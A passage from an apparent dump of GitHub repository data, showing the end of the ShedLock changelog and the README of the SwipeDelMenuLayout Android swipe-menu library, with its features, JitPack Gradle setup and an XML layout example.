-* Support for property placeholders in annotation lockAtMostForString/lockAtLeastForString
-* Support for composed annotations
-* ScheduledLockConfigurationBuilder introduced (deprecating SpringLockableTaskSchedulerFactory)
-
-## 0.11.0
-* Support for Redis (thanks to @clamey)
-* Checking that lockAtMostFor is in the future
-* Checking that lockAtMostFor is larger than lockAtLeastFor
-
-
-## 0.10.0
-* jdbc-template-provider does not participate in task transaction
-
-## 0.9.0
-* Support for @SchedulerLock annotations on proxied classes
-
-## 0.8.0
-* LockableTaskScheduler made AutoClosable so it's closed upon Spring shutdown
-
-## 0.7.0
-* Support for lockAtLeastFor
-
-## 0.6.0
-* Possible to configure defaultLockFor time so it does not have to be repeated in every annotation
-
-## 0.5.0
-* ZooKeeper nodes created under /shedlock by default
-
-## 0.4.1
-* JdbcLockProvider insert does not fail on DataIntegrityViolationException
-
-## 0.4.0
-* Extracted LockingTaskExecutor
-* LockManager.executeIfNotLocked renamed to executeWithLock
-* Default table name in JDBC lock providers
-
-## 0.3.0
-* `@SchedulerLock.name` made obligatory
-* `@SchedulerLock.lockForMillis` renamed to lockAtMostFor
-* Adding plain JDBC LockProvider
-* 
Adding ZooKeeper LockProvider
-",0
-mcxtzhang/SwipeDelMenuLayout,"The most simple SwipeMenu in the history, 0 coupling, support any ViewGroup. Step integration swipe (delete) menu, high imitation QQ, iOS. ~史上最简单侧滑菜单,0耦合,支持任意ViewGroup。一步集成侧滑(删除)菜单,高仿QQ、IOS。~",2016-08-25T08:10:45Z,,"# SwipeDelMenuLayout
-[![](https://jitpack.io/v/mcxtzhang/SwipeDelMenuLayout.svg)](https://jitpack.io/#mcxtzhang/SwipeDelMenuLayout)
-
-#### [中文版文档](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/README-cn.md)
-
-Related blog:
-V1.0:
-http://blog.csdn.net/zxt0601/article/details/52303781
-
-V1.2:
-http://blog.csdn.net/zxt0601/article/details/53157090
-
-If you like it, please give it a star, thank you very much
-## Where to find me:
-Github:
-
-https://github.com/mcxtzhang
-
-CSDN:
-
-http://blog.csdn.net/zxt0601
-
-gold.xitu.io:
-
-http://gold.xitu.io/user/56de210b816dfa0052e66495
-
-jianshu:
-
-http://www.jianshu.com/users/8e91ff99b072/timeline
-
-***
-# Important: not only for RecyclerView or ListView, but for any ViewGroup.
-
-# Intro
-
-This control has been used in a production project for the past seven months, and about two months have passed since it was first published. (Earlier I wrote an article, http://gold.xitu.io/entry/57d1115dbf22ec005f9593c6/detail, describing in detail how the V1.0 version was implemented.)
-During that time many friends left comments and **raised improvements in issues, such as supporting a configurable swipe direction (left or right), high-fidelity QQ-style interaction, and GridLayoutManager support, and also reported some bugs**. I have implemented or fixed all of them, **and packaged the library on JitPack for easier integration**. Compared with the first version a lot has changed, hence this new release.
-So this article first shows how to use the control, then introduces the features it contains and the attributes it supports, and finally covers a few difficulties and conflict resolutions.
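-
-The improvements mentioned above (configurable swipe direction, iOS-style blocking interaction) are exposed as XML attributes on the control. Below is a minimal sketch of such an item layout; the attribute names (`app:ios`, `app:leftSwipe`, `app:swipeEnable`) and child views are assumptions based on the demo project, so check them against your version:
-
-```
-<!-- Hedged sketch: attribute names and children assumed from the demo project -->
-<com.mcxtzhang.swipemenulib.SwipeMenuLayout
-    xmlns:android=""http://schemas.android.com/apk/res/android""
-    xmlns:app=""http://schemas.android.com/apk/res-auto""
-    android:layout_width=""match_parent""
-    android:layout_height=""wrap_content""
-    app:ios=""false""
-    app:leftSwipe=""true""
-    app:swipeEnable=""true"">
-
-    <!-- content view comes first -->
-    <TextView
-        android:layout_width=""match_parent""
-        android:layout_height=""wrap_content""
-        android:text=""ContentItem"" />
-
-    <!-- menu view(s) follow the content view -->
-    <Button
-        android:id=""@+id/btnDelete""
-        android:layout_width=""wrap_content""
-        android:layout_height=""match_parent""
-        android:text=""Delete"" />
-</com.mcxtzhang.swipemenulib.SwipeMenuLayout>
-```
-
-Setting `app:ios=""true""` would switch to the blocking QQ/iOS-style interaction, and `app:leftSwipe=""false""` would reverse the swipe direction.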
-
-ItemDecorationIndexBar + SwipeMenuLayout
-(The biggest strength of this control is zero coupling, so first see it working together with another of my libraries):
-(ItemDecorationIndexBar : https://github.com/mcxtzhang/ItemDecorationIndexBar)
-
-![image](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/ItemDecorationIndexBar_SwipeDel.gif)
-
-It is also easy to use in a flow layout:
-
-![](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/FlowSwipe.gif)
-
-
-Android-style version (non-blocking: while one swipe menu is open, another item's menu can still be expanded, and the previous menu closes automatically):
-
-![image](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/LinearLayoutManager1.gif)
-
-GridLayoutManager (compared with the code above, only the RecyclerView's LayoutManager needs to be changed):
-
-![image](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/grid.gif)
-
-LinearLayout (without any modification, even a plain LinearLayout can implement a swipe menu):
-
-![image](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/linear.gif)
-
-iOS-style interaction (blocking, a high imitation of QQ: while a swipe menu is expanded, all operations on other items are blocked):
-
-![image](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/iOS.gif)
-
-Use in a ViewPager:
-![image](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/viewpager.gif)
-
-
-
-
-# Usage:
-Step 1. Add the JitPack repository to your build file.
-Add it in your root build.gradle at the end of repositories:
-```
-    allprojects {
-        repositories {
-            ...
-            maven { url ""https://jitpack.io"" }
-        }
-    }
-```
-Step 2. Add the dependency
-```
-    dependencies {
-        compile 'com.github.mcxtzhang:SwipeDelMenuLayout:V1.3.0'
-    }
-```
-
-
-Step 3. 
Wrap this control around the content item that needs swipe-to-delete; inside the control, lay out the content item first, then the menu:
-**At this point you can use the high-imitation iOS/QQ swipe-delete menu.**
-(Click events of the swipe menu are obtained by setting an id, the same as for any other control, so they are not covered here.)
-
-In the demo my content item is a TextView; I nest it inside this control and then, in order, arrange the menu controls after it.
-```
-
-
-
-
-
-
-